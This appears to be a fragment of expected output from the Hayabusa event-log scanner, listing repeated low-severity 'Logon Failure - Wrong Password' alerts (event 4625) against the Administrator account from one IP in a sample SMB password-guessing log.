+2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qixqXiX0mVcuXe37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIfJCJz6l36WMeY9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZxv5U7uoN6E8c8E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mlIfE0N32OQeWuNw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkZcjpTmHcJ0uX38 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZfaHr2Yq6xkRjOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvy0EIiPSnom7pn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TN9PUb0BgI3u8Xax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xCgz5BNpQgLgW0Xi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: po2GBdrXr3XtBsWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O2rgo6jHcqu10IGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLblUOGzYzVA47E9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ysuA1xpYuAGRNONJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ksedziaGzXk5VNlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: irIfGLQdhtRRGwuo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YCf6WUjiS11hHqKT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1o0CTT7GsWfCWuHx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F6Jr8XrUsmTiSdol | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Buj66iuSkLEQdKnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L1wOLI51HqfkgO6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4oe273WXOICzkwW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1c7nGezYNJ70jR6R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajuZ09zGeuovCQLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4k7xV7soNF4mHlz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CtdqW8zOw1GoQcvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aY6FLi1edRZWrRZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ah1JoKfxJzQhCCVL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIMOZRGcv4o33BWd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmLyLJoVZz6fJ62I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGufqEGD4hFf2XLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7IEdKy2H5Agblpjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XT9k8C05GVLBNPdl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5opHh8HelCXtR5Cm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0dntDwYLmag9efo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQfZOMFV9LtY7r2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y01v38dTUIsJEZIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCP8x2QBZ6IvMEnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hgcbYjw3kKqlK7Di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TFU97Tq3e7IWvSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hUCvaS1yM2FU9AE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JInVlBqTSfT4J1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjXRQUGDKBZaMkw3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZPXNxkGOrld5eCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OBDhSrF7DZ1KBRa8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQ7TKJOGibAVNoCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZE1GARxx03m4FtEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gf3VLLTxsK85bsrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58G6MFVbW55JZIV5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yxne9LqZCqBf3qkc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ssZya6gArnuepKyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rsDEj6o0NaKUYPZL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pELSIsupIYAxPCtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urHCDmdCfNexxUHf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czGXZFukLquA9Mce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: icWMY9pKCQMyTxJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v28FLC2WXEXSUiI5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FwhjHww5iA51SFjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 96BwmhKqDIojhdRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DiRvofjwoeAdHYrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNLdOrPwbvYELiCc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x15WKTspmg2ALHaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QMoQWddkcYtCmoKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jhTbfX42Pwn7OA2k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXcbUCgAhVFfqLc3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GHyXVM0jpaKBiY9N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TZoWEcU6VbEnrLpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LIfEzNQWwvrai4ga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DhImfqWz7SHId9hE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6sekQfneNE5uFtx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iEQ6KkZEHGcSgdA8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qzxJYBbM7ZMaaGOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wO5GFBqSltNfjtQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PdsMzjfP1ZcPju2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LqpKmoCX9slPXie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
